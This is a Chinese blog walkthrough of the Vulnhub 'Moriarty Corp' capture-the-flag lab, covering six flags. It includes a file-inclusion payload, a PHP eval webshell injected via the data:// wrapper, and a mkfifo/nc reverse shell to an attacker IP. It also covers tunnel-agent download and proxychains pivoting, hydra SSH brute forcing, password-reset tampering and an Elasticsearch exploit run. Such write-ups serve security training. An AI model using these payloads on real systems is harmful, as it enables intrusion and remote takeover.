靶场MoriartyCorp

已于 2023-04-11 19:17:21 修改
阅读量173 收藏
点赞数
分类专栏: 靶场 文章标签: php 安全
于 2023-04-11 18:28:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77561609/article/details/130080090
版权

  • 第一关8afe2a6c91154659aa403eab5dd98fff.png

     输入flag{start}

  • 第二关dc6a3e31abb64b67a2918d414e1cceee.png

     

  1.  根据提示访问80端口

    65ef19c8b7814492ad0c43e4ab520c88.png
  2. 根据页面链接猜测为文件包含漏洞fae28acb182a487087c8b0f76625ece3.png
  3. 通过下面链接测试文件包含漏洞 
    ?file=../../../../../etc/passwd
    8a8a9b6896854381b3755b7c9a8cbac4.png
  4. 使用data伪协议传一句话木马,再用中国蚁剑链接shell 
    ?file=data://text/plain,<?php eval($_POST['123'])?>

    7bb1a57d6b70428cb5664096c6ef3043.png

  5.  

    在主目录中发现1_flag.txt文件,获取到flag{the_game_is_on}并提交

     

     

  • 第三关 070ce962a594486bada4784a79ab2fdf.png

  1.  通过提示需要进行内网穿透扫描172.17.0.3-254,首先攻击机开启侦听端口4444 
    nc -lvp 4444
  2. 通过下面代码反弹shell,或是安装上一关通过中国蚁剑获取shell 
    http://192.168.XXX.XXX/?file=data://text/plain,%3C?php%20$a=$_GET[%22abc%22];exec($a);echo%20$a;?%3E&abc=rm+/tmp/f;mkfifo+/tmp/f;cat+/tmp/f|/bin/sh+-i+2%3E%261|nc+192.168.XXX.XXX+4444+%3E/tmp/f
  3. 共享隧道代理工具venom中的agent_liunx_x64 
    cp agent_linux_x64 /var/www/html

    service apache2 start
  4. 通过反弹的shell窗口下载 
    wget http://192.168.xxx.xxx/agent_linux_x64
  5. 使用隧道代理链接 
    攻击端:./admin_linux_x64 -lport 8888
    服务器端:chmod +x agent_linux_x64
         ./agent_linux_x64 -rhost 192.168.xxx.xxx -rport 8888
  6. 获取shell后开启socks5代理 
    show
goto 1
socks 1080
  7. 配置攻击机proxychains,修改proxychains4.conf的内容最后一行为socks5 172.0.0.1 1080 
    nano /etc/proxychains4.conf
  8. 通过namp扫描,浏览器插件挂代理访问172.17.0.4:80525953510fb34badbce0bb37062f16ac.png
  9. 上传一句话,burpsuite爆破密码得到密码password和上传位置./photo/23/php_shell_123.php,中国蚁剑挂代理链接找到2_flag.txt:flag{picture_is_worth_1000_words}

    c48bad05041f4339b8058db7c31f6378.png

  •  第四关a0bd5648db8a4f6593a1684c8a5642bd.png

  1.  通过提示,进行md5解密
    63a9f0ea7bb98050796b649e85481845root
    7b24afc8bc80e548d66c4e7ff72171c5toor
    5f4dcc3b5aa765d61d8327deb882cf99password
    21232f297a57a5a743894a0e4a801fc3admin
    084e0343a0486ff05530df6c705c8bb4guest
    697c6cc76fdbde5baccb7b3400391e30MORIARTY
    8839cfc8a0f24eb155ae3f7f205f5cbcMCORP
    35ac704fe1cc7807c914af478f20fd35mcorp
    b27a803ed346fbbf6d2e2eb88df1c51bweapons
    08552d48aa6d6d9c05dd67f1b4ba8747moriarty

















     

  2. namp 显示172.17.0.5开启了22端口,hydra爆破ssh 
    proxychains4 hydra -L user.txt -P password.txt ssh://172.17.0.5
    得到账号:root,密码:weapons
     
  3. 登录ssh,获取3_flag.txt内容flag{what_weapons}
    278e632a7b6f41a4b10f8fd6908a6464.png

  •  第五关781da1109f8142559af477422887323c.png

  1.  nmap扫描,访问172.17.0.6:8000,并用提示中的账户密码登录1738d4716d46497db427347d867a8d4a.png
  2. 通过chats页面得知存在账户adminc85aceaebbbf4750af025a4ed6e3c93d.png
  3. 通过change页面修改密码,并用burpsuite抓包修改用户admin的密码为1234561eeab16e9b0e470ebd89f545708c324e.png
  4. 换一个浏览器登录admin账户,得到flag:flag{on_the_move} 5f9f5cadbd084e78a89d9feae6bd8d05.png

  •  第六关c2b6f4464411479aa87c1de28c86936b.png

  1.  elasticsearch的标准服务端口为9200,namp扫描内网,得到ip地址172.17.0.7b7799d564d6f482b9e77927ae5e95cff.png8fe7d5648fa64404bc92a516de1610b2.png
  2. 使用searchsploit命令,然后攻击漏洞,得到flag:flag{game_over} 
    searchsploit elasticserarch
cp /usr/share/exploitdb/exploits/linux/remote/36337.py .
proxychains4 python2 36337.py 172.17.0.7

     

 

 

 

 

 

 

 

 

 

 

 

 

 

2301_77561609
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
vulnhub_内网渗透测试的记录——网络安全
HBohan的博客
07-31 516
主要考察知识点 文件包含 内网穿透 命令上传 弱口令 更改权限 HTTP协议Header ElasticSearch-CVE 暴力破解 网络拓扑 写完之后把靶机的网络拓扑也做了一下 写在之前 这次用的虚拟机是VM_VirtualBox,第一次用,配置了许久,因为靶机是内网环境,所以有些网络配置需要手动调整 网络配置设置成如上,再次扫描IP,根据MAC地址就可以找到我们的靶机IP了。 靶机下载地址: BoredHackerBlog: M.
开源靶场zsbdzsbd
04-19
【开源靶场zsbdzsbd】是一个专注于网络安全的开源项目,其主要目的是为网络安全爱好者、学生和专业人士提供一个实践和学习网络安全技能的平台。在这个靶场中,你可以找到各种模拟真实网络环境中存在的漏洞,通过实战...
靶机渗透-Vulnhub-Moriarty Corp
dahege666的博客
08-18 741
Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务器进行web攻击,依据提交flag后的提示信息,逐步获取内网主机权限。 1、靶场环境 攻击机kali:191.168.239.131 Moriarty Corp: web:192.168.239.135 内网:172.17.0.3 Moriarty Corp 内网1:172.17.0.4 Moriarty Corp 内网2:172.17.0.5 Moriarty Corp 内网3:172.17.0.7 ...
Moriarty Corp靶场攻略
Ms08067安全实验室
04-15 2829
点击上方“蓝字”注公众号获取最新信息!本文作者:a-running-snail(贝塔安全实验室)Moriarty Corp靶场环境包含一台外网服务器和三台内网主机,攻击者需先对外网服务...
vulnhub靶机-MoriartyCorp
臭nana的博客
05-01 3885
参考文章:https://blog.csdn.net/shuteer_xu/article/details/105549120 由于参考了这篇文章,所以前期使用kali做的,但是后面可能由于自身原因,达不到和他一样的效果,所以用了windows的reGeorg进行代理(后面会知道),其实可以全程在windows下操作。 环境:虚拟机采用桥接模式 靶机ip:192.168.0.106(还有一个.........
MoriartCorpCTF靶场渗透测试
qq_41567985的博客
11-02 80
MoriartCorp靶场是一个内网渗透的典型靶场,对我来说非常具有挑战,如果不借助网络的力量下单独完成100%不可能,其中有很多漏洞:文件包含、文件泄露、系统内核提权等。聊天中提到的商店可能使用了后端数据库,请尝试破坏该服务器。在kali机上创建一个内容为:
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场
rang的博客
08-19 2332
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
vulnhub-MoriartyCorp渗透测试
遇事不决冲冲冲
11-25 3425
环境搭建 这个环境搭建还是很奇怪的,必须用virtual box,用vmware会出现扫不到ip的情况(一个区域网下有一个人搭建环境的话其他人可以直接访问到。) Moriarty Corp官网下载地址 思路 渗透测试 仍然是刚开始直接用arp-scan(nmap)进行ip扫描,nmap进行端口扫描 sudo arp-scan -l nmap -sV 192.168.1.247 ...
pikachu靶场环境
02-12
"pikachu靶场环境" 是一个专门为网络安全学习和实践设计的平台,它为用户提供了一个安全的、受控的环境来模拟真实的网络攻击与防御场景。在这个环境中,参与者可以学习和提升自己的渗透测试技巧,同时了解如何加固...
uploadlabs靶场文件
02-27
这个靶场可以帮助安全研究人员、开发人员以及网络安全爱好者了解和掌握如何预防和修复文件上传漏洞。 【描述】:该靶场是基于PHPStudy的LAMP(Linux、Apache、MySQL、PHP)环境搭建的。"www"目录是Apache服务器默认...
webgoat靶场需要自行搭建
01-19
WebGoat是一个知名的在线安全靶场,主要用于网络安全教育和练习,尤其在Web应用程序安全领域具有重要地位。这个项目由OWASP(开放网络应用安全项目)维护,旨在帮助开发者、安全人员以及学生理解和学习常见的Web应用...
pikachu-master靶场
07-14
"pikachu-master靶场" 是一个专门为网络安全学习和实践设计的平台,它通常包含了一系列的挑战,旨在帮助用户提升其在黑客攻防、漏洞挖掘、安全防护等领域的技能。这个压缩包文件“pikachu-master”很可能包含了该...
PHP编程开发工具有哪些?
Pythonit教程网
07-10 991
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 958
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
三级_网络技术_14_局域网技术基础及应用
最新发布
2301_80961833的博客
07-12 208
连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CA介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMA/CD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。连接到集线器的结点发送数据时,将执行CSMACD介质访问控制方法。
java版的上门家政系统和PHP版的上门家政有什么区别?
baina666的博客
07-12 364
综上所述,Java版和PHP版的上门家政系统各有优缺点,选择哪种语言主要取决于项目的具体需求、预算、开发团队的技术栈以及未来的扩展计划等因素。同时,由于Java生态系统的复杂性和多样性,也可能需要投入更多的时间和资源来学习和掌握相的技术和工具。Java版:Java拥有庞大的生态系统和丰富的第三方库,这为家政系统的开发和扩展提供了强大的支持。Java版:由于Java的编译执行机制和高效的垃圾回收算法,Java版家政系统通常具有更高的运行效率和更好的性能表现,尤其是在处理高并发、大数据量等复杂场景时。
PHP7.4安装使用rabbitMQ教程(windows)
qq_28546559的博客
07-09 217
1,可能报错ext-sockets * -> it is missing,在php.ini中开启sockets扩展既可。下载地址:https://pecl.php.net/package/amqp。3,修改php.ini文件,增加extension=php_amqp.dll。1,将php_amqp.dll放到对应的php的ext目录下。三,安装库——php-amqplib/php-amqplib。一,检查php版本phpinfo()——下载所需扩展。
Vulnhub靶场DC-6练习
Reset
07-08 974
netdiscover探测目标主机ip。nmap探测开放端口和服务。dirsearch查看网站目录结构。wpscan扫描wordpress的用户。wpscan利用wordlists字典爆破密码。Activity monitor插件的漏洞:CVE-2018-15877反弹shell。nmap提权。
pikachu靶场SQL注入.docx
09-13
"pikachu靶场SQL注入章节解题" SQL注入是一种常见的网络安全漏洞,它发生在应用程序未能正确过滤用户输入,使得恶意构造的SQL代码能够被执行。在这个"Pikachu靶场"的SQL注入卡中,我们将深入理解如何识别和利用...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值